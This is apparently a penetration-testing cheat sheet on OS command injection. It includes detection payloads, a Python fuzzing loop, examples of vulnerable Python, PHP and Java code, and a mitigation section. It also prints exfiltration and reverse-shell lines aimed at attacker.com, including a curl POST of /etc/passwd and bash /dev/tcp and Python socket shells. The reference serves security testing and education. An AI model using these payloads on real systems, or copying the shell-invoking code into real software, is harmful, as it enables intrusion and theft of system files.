OS Command Injection

OS Command Injection Reference

Overview

OS Command Injection allows attackers to execute arbitrary operating system commands on a server by injecting malicious input into system commands.

CWE: CWE-78, CWE-88

Common Attack Vectors

Command Separators

• Unix/Linux: &, &&, |, ||, ;, \n, backticks, $()

• Windows: &, &&, |, ||, cmd /c

Context Breakouts

• Quote escape: " or ' followed by separators

• Parameter injection: Additional arguments to existing commands

Testing Payloads

Basic Detection

# Unix/Linux
& whoami &
| id
; uname -a
`whoami`
$(whoami)

# Windows  
& whoami &
| whoami
; ver

Blind Injection

# Time delays
& ping -c 10 127.0.0.1 &
& sleep 10 &

# Output redirection
& whoami > /var/www/html/out.txt &

# OAST (Out-of-band)
& nslookup test.attacker.com &
& curl http://attacker.com/$(whoami) &

Testing Methodology

1. Parameter Identification

# Find potential injection points
curl "http://target.com/api?param=test"

2. Injection Testing

import requests

payloads = ["& whoami &", "| id", "; uname -a", "`whoami`"]
for payload in payloads:
    response = requests.get(f"http://target.com/api?param={payload}")
    print(f"Payload: {payload}\nResponse: {response.text[:100]}\n")

3. System Enumeration

# Linux
whoami          # Current user
uname -a        # System info
ifconfig        # Network config
ps -ef          # Running processes
cat /etc/passwd # Users

# Windows
whoami          # Current user
ver             # OS version
ipconfig /all   # Network config
tasklist        # Running processes

Vulnerable Code Patterns

High Risk

# Python
os.system(f"command {user_input}")
subprocess.run(f"command {user_input}", shell=True)

# PHP
system("command " . $user_input);
exec("command " . $user_input);

# Java
Runtime.getRuntime().exec("command " + userInput);

Exploitation Techniques

Command Chaining

original_command; malicious_command
original_command && malicious_command
original_command | malicious_command

Data Exfiltration

# File read
& cat /etc/passwd > /var/www/html/passwd.txt &

# Network exfiltration
& curl -X POST -d @/etc/passwd http://attacker.com/data &

Reverse Shell

# Bash
& bash -i >& /dev/tcp/attacker.com/4444 0>&1 &

# Python
& python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &

Detection Techniques

Response Analysis

• Look for system command output (usernames, OS info)

• Check for error messages revealing command structure

• Monitor response times for blind injection

OAST Testing

# DNS exfiltration
& nslookup $(whoami).attacker.com &

# HTTP callback
& wget http://attacker.com/$(id|base64) &

Mitigation

Secure Coding

# Good: Avoid shell execution
subprocess.run(["command", arg1, arg2], shell=False)

# Good: Input validation
import re
if re.match("^[a-zA-Z0-9]+$", user_input):
    subprocess.run(["command", user_input], shell=False)

Input Validation

• Whitelist allowed characters

• Validate input length and format

• Escape shell metacharacters

• Use parameterized commands

Tools

Manual Testing

• Burp Suite: Parameter manipulation

• curl: Command line testing

• Netcat: Network interaction testing

Automated

• Commix: Command injection tool

• OWASP ZAP: Web app scanner

• sqlmap: Parameter injection testing

Quick Reference

Testing Checklist

• Test command separators

• Test quote breakouts

• Test basic commands (whoami, id, ping)

• Test blind techniques (delays, OAST)

• Test output redirection

• Enumerate system information

• Test privilege escalation

• Attempt reverse shells

Common Endpoints

• File operations: /upload, /download, /convert

• System utilities: /ping, /traceroute, /nslookup

• Admin functions: /backup, /restore, /config

• API endpoints: /api/exec, /api/run, /api/system